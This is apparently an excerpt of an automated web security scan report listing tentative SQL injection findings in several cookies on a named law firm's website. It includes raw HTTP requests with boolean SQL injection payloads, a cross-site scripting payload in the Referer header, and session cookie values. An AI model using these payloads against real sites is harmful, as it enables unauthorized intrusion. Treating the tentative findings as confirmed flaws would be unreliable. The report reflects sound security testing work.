1.36. http://www.pillsburylaw.com/a [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 14571208'%20or%201%3d1--%20 and 14571208'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/614571208'%20or%201%3d1--%20; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:34:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Thu, 13-May-2010 00:34:38 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/614571208'%20or%201%3d2--%20; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:34:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.37. http://www.pillsburylaw.com/a [hsfirstvisit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hsfirstvisit cookie appears to be vulnerable to SQL injection attacks. The payloads 15918602'%20or%201%3d1--%20 and 15918602'%20or%201%3d2--%20 were each submitted in the hsfirstvisit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4615918602'%20or%201%3d1--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HSFIRSTVISIT=;expires=Thu, 13-May-2010 00:35:43 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A4615918602'%20or%201%3d2--%20; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:35:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.38. http://www.pillsburylaw.com/a [hubspotdt cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotdt cookie appears to be vulnerable to SQL injection attacks. The payloads 20857946'%20or%201%3d1--%20 and 20857946'%20or%201%3d2--%20 were each submitted in the hubspotdt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A2520857946'%20or%201%3d1--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:34:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTDT=;expires=Thu, 13-May-2010 00:34:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A2520857946'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:34:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.39. http://www.pillsburylaw.com/a [hubspotutk cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 15919628'%20or%201%3d1--%20 and 15919628'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee515919628'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:34:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Thu, 13-May-2010 00:34:58 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee515919628'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:34:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.40. http://www.pillsburylaw.com/a [hubspotvd cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 17968108'%20or%201%3d1--%20 and 17968108'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee517968108'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Thu, 13-May-2010 00:35:09 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee517968108'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:35:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
